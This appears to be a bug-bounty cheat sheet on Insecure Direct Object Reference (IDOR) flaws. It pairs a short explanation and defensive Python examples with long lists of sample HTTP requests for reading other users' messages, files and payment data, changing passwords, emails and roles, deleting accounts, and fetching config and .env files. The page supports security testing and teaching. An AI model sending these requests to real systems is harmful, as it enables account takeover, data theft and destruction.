IDOR
IDOR, or Insecure Direct Object Reference, is an access control vulnerability where an application relies on user-supplied input to fetch data without proper authorization checks. This means an attacker can manipulate request parameters, such as IDs in URLs or API calls, to access unauthorized information like personal details, private files, or even entire database records.
For example, if changing orderId=1234 to orderId=1235 in a request lets someone view another user’s order, that’s a classic IDOR flaw. Since these vulnerabilities can exist throughout an application, security testers often look for patterns in object references, even if they appear obfuscated or encoded.
How Does IDOR Work?
- A web application uses predictable object references (e.g., sequential user IDs, file numbers, or tokens).
- The app fails to validate whether the user is authorized to access a particular resource.
- An attacker manipulates request parameters to access unauthorized data.
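The three steps above in code, as an added example that is not part of the original page: a handler that fetches an order straight from the request parameter, beside two hardened versions that tie the lookup to the server-side session identity. The order data, user ids and function names are constructed for illustration.

```python
"""Added example, not code from the original page: one order-lookup endpoint
written the way IDOR happens, beside a hardened version. All data, user ids
and function names are constructed for illustration."""
from typing import Tuple

# Constructed sample data: order_id -> (owner_user_id, order description)
ORDERS = {
    1234: (42, "alice: 2x widgets"),
    1235: (77, "bob: 1x gadget"),
}

def fetch_order_vulnerable(order_id: int) -> Tuple[int, str]:
    """Vulnerable handler: the record is selected purely from the user-supplied
    orderId. The logged-in user is never compared with the owner, so changing
    1234 to 1235 in the request returns another customer's order."""
    rec = ORDERS.get(order_id)
    return (200, rec[1]) if rec else (404, "not found")

def fetch_order_hardened(session_user_id: int, order_id: int) -> Tuple[int, str]:
    """Fixed handler: the ownership check uses the identity from the server-side
    session, never a user_id taken from the request. Foreign and non-existent
    objects get the same 404, so the response does not confirm that an id exists."""
    rec = ORDERS.get(order_id)
    if rec is None or rec[0] != session_user_id:
        return (404, "not found")
    return (200, rec[1])

def fetch_order_scoped(session_user_id: int, order_id: int) -> Tuple[int, str]:
    """Same guarantee expressed as a scoped lookup: the owner is part of the key,
    which is how a query such as `WHERE id = ? AND owner_id = ?` behaves. No
    code path can reach a record without the owner constraint."""
    by_owner = {(owner, oid): desc for oid, (owner, desc) in ORDERS.items()}
    desc = by_owner.get((session_user_id, order_id))
    return (200, desc) if desc else (404, "not found")
```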
Manual Exploitation Payloads
Access Another User’s Private Messages
Some applications do not validate user ownership of messages, allowing attackers to view others' conversations.
GET /api/messages?user_id=9876
GET /api/messages?recipient_id=8888
GET /api/messages?thread_id=1234&user_id=9999
GET /messages/view?msg_id=56789
POST /messages/fetch?chat_id=7777&user_id=4321
Download Another User’s File
If file access control is weak, changing the filename can allow unauthorized downloads.
GET /api/download?file=user123_report.pdf
GET /api/files/download?filename=invoice_456.pdf
GET /user_data/12345/secret_document.docx
GET /download?path=/home/user/private.pdf
POST /api/files?file_id=2222&access=public
Modify Another User’s Profile Settings
If user ID parameters are poorly validated, an attacker can modify another user’s settings.
POST /api/updateSettings?user=admin&dark_mode=true
POST /api/user/update?user_id=5432&[email protected]
PUT /profile/settings?user_id=9999&privacy=public
POST /settings/update?user=8888&notifications=off
PATCH /api/user/5678?bio=HackedByMe
Delete Another User’s Account
Lack of proper authorization checks can allow attackers to delete other users.
DELETE /api/removeUser?id=9999
POST /api/deleteUser?user_id=1234
GET /admin/delete_account?user_id=5678
POST /account/remove?target_id=7777
PUT /api/user/deactivate?uid=4321
Access Admin Logs
If endpoint security is weak, an attacker can directly request admin logs.
GET /logs/admin?logfile=server.log
GET /api/logs?type=admin_access
POST /debug/logs?user_id=0&admin=true
GET /internal/audit?log_id=20240305
GET /server/logs/error.log
Change User Role to Admin
Some applications allow role manipulation by modifying the user role parameter.
POST /api/updateRole?user_id=1234&role=admin
PUT /api/user/modifyRole?uid=8888&role=superuser
POST /users/update?user=7777&privilege=99
PATCH /api/users/setRole?user=2222&role=owner
PUT /system/users?user_id=4444&access_level=superadmin
View Another User’s Order Details
Weak access control can expose sensitive order details.
GET /api/orders?order_id=5678
POST /order/details?order=9999
GET /user/purchase?uid=4321
GET /invoice/view?inv_id=7777
POST /api/orders/history?user=2222
Access Another User’s Payment Information
Changing the user ID in a billing API call might reveal payment details.
GET /api/billing?user_id=9999
GET /user/payment/details?uid=8888
POST /transactions/view?customer_id=7777
GET /wallet/history?account=4321
POST /api/cards?user=2222
Change Password for Another User
If password reset requests don’t verify ownership, attackers can change other users' passwords.
POST /api/resetPassword?user_id=5555&new_password=hacked123
GET /password/reset?target=9999
POST /account/password/change?user=7777&new_pass=pass123
PUT /api/auth/updatePassword?uid=4321&new=hello123
PATCH /users/modifyPassword?account=2222&password=newpass
Retrieve Private Images or Documents
Some applications expose file paths without proper authorization checks.
GET /api/userImages?img=private_doc_001.pdf
GET /uploads/view?file=secret_picture.png
POST /files/access?file_id=7777&user=4321
GET /private/images/9999.png
GET /api/resources/view?doc_id=2222
Add Another User to a Private Group Without Permission
By manipulating group parameters, an attacker can add users without consent.
POST /api/group/addMember?group_id=7777&user_id=8888
GET /group/invite?gid=9999&target=4321
POST /team/addUser?team=5678&user=2222
PUT /community/join?member=1111&group=4321
PATCH /forum/addMember?uid=7777&group_id=6666
Gain Unauthorized API Access Using Wildcards
Using wildcard characters may bypass security checks and expose more data.
GET /api/users/*
GET /data/all_records?*
POST /api/logs?entry=*
GET /search?q=*
POST /system/list?all=*
Bypass User Verification by Replacing Email with User ID
Some applications authenticate users based on email but allow direct ID-based access.
POST /api/authenticate?user_id=4321
GET /auth/[email protected]&uid=9999
POST /session/create?user=7777&auth=true
GET /api/auth/check?username=admin
POST /login/override?user_id=2222
Change Another User’s Email Address
If email update requests don’t verify passwords, attackers can hijack accounts.
PUT /api/updateEmail?user_id=1234&[email protected]
POST /account/modifyEmail?uid=8888&[email protected]
PATCH /profile/edit?user=7777&[email protected]
POST /users/changeEmail?target=4321&[email protected]
GET /api/settings/email?user_id=2222&[email protected]
Disable Another User’s Account
Some applications allow account disabling through an easily modifiable request.
POST /api/disableAccount?user_id=7890
PUT /users/deactivate?uid=8888
GET /admin/account/ban?user=7777
POST /system/user/disable?target=4321
PATCH /account/suspend?user=2222
Retrieve Internal Configuration Files
Appending different extensions might expose system configurations.
GET /config/settings.json
GET /system/config.xml
GET /server/env_vars?file=.env
GET /admin/settings.ini
GET /api/config/db_config.yaml
View All User Profiles by ID Enumeration
Sequentially modifying user IDs may allow enumeration of user profiles.
GET /api/users/profile?user_id=1001
GET /user/info?uid=9999
POST /directory/view?user=7777
GET /api/members?account=4321
POST /app/users?id=2222
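The defender's view of the enumeration pattern above, as an added example that is not from the original page: a small detection routine that flags a session successfully reading many distinct object ids from one endpoint. The access-log lines, the `sess=` field and the threshold are constructed for illustration.

```python
"""Added example, not from the original page: flag sessions that probe many
distinct object ids on a single endpoint, the signature of ID enumeration.
Log format, session labels and threshold are constructed for illustration."""
import re
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# Constructed access-log excerpt: session, method, path, status
ACCESS_LOG = """\
sess=A GET /api/users/profile?user_id=1001 200
sess=A GET /api/users/profile?user_id=1002 200
sess=A GET /api/users/profile?user_id=1003 200
sess=A GET /api/users/profile?user_id=1004 200
sess=A GET /api/users/profile?user_id=1005 200
sess=B GET /api/users/profile?user_id=1001 200
sess=B GET /api/orders?order_id=5678 200
"""

LINE_RE = re.compile(r"^sess=(\S+) (\S+) (\S+?)(?:\?(\S+))? (\d{3})$")

def distinct_ids_per_session(log: str) -> Dict[Tuple[str, str], Set[str]]:
    """Group successful requests by (session, path) and collect the distinct
    values of every query parameter whose name ends in 'id'."""
    seen: Dict[Tuple[str, str], Set[str]] = defaultdict(set)
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        sess, _method, path, query, status = m.groups()
        if status != "200":
            continue  # only successful reads mean data was actually returned
        for kv in (query or "").split("&"):
            name, _, value = kv.partition("=")
            if name.lower().endswith("id"):
                seen[(sess, path)].add(value)
    return seen

def flag_enumeration(log: str, threshold: int = 5) -> List[Tuple[str, str]]:
    """Return (session, path) pairs that read at least `threshold` distinct ids.
    A legitimate user rarely needs many other users' records from one endpoint,
    so the pair is a reasonable alert that an IDOR is being worked through."""
    return sorted(key for key, ids in distinct_ids_per_session(log).items()
                  if len(ids) >= threshold)
```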
Modify Another User’s Subscription Plan
Some applications allow direct plan upgrades or downgrades via parameter tampering.
POST /api/updatePlan?user_id=2222&plan=premium
PUT /subscription/change?uid=8888&plan=gold
PATCH /billing/modifyPlan?account=7777&new=enterprise
GET /api/upgrade?target=4321&level=pro
POST /plans/set?user=2222&subscription=lifetime
Access Hidden Admin Dashboard
Some applications have hidden admin panels accessible via direct URL manipulation.
GET /admin/dashboard
GET /management/controlPanel
POST /superuser/home
GET /root/admin?access=1
GET /secure/admin/home
Escalate Privileges by Overwriting an Existing Role
If role changes are not properly restricted, attackers can elevate their privileges.
PUT /api/user/role?user_id=6543&role=superadmin
POST /roles/set?user=8888&privilege=99
PATCH /admin/users?uid=7777&role=root
POST /api/access/update?account=4321&clearance=highest
GET /system/users?user_id=2222&access_level=superuser
Testing for IDOR (Automated Method)
- Finding Broken Access Controls
- PimpMyBurp #1 - PwnFox + Autorize: The perfect combo to find IDOR - Global Bug Bounty Platform
- Automating BURP to find IDORs
Writeups
- Full account takeover worth $1000 Think out of the box
- All About Getting First Bounty with IDOR
- IDOR that allowed me to takeover any users account
- All About IDOR Attacks
- Access developer tasks list of any of Facebook Application
- Everything You Need to Know About IDOR
- Finding more IDORs - Tips and Tricks
- KathanP19/HowToHunt
- Learn about Insecure Object Reference (IDOR) | BugBountyHunter.com
- WSTG - v4.2
- IDOR
- What I learnt from reading 220* IDOR bug reports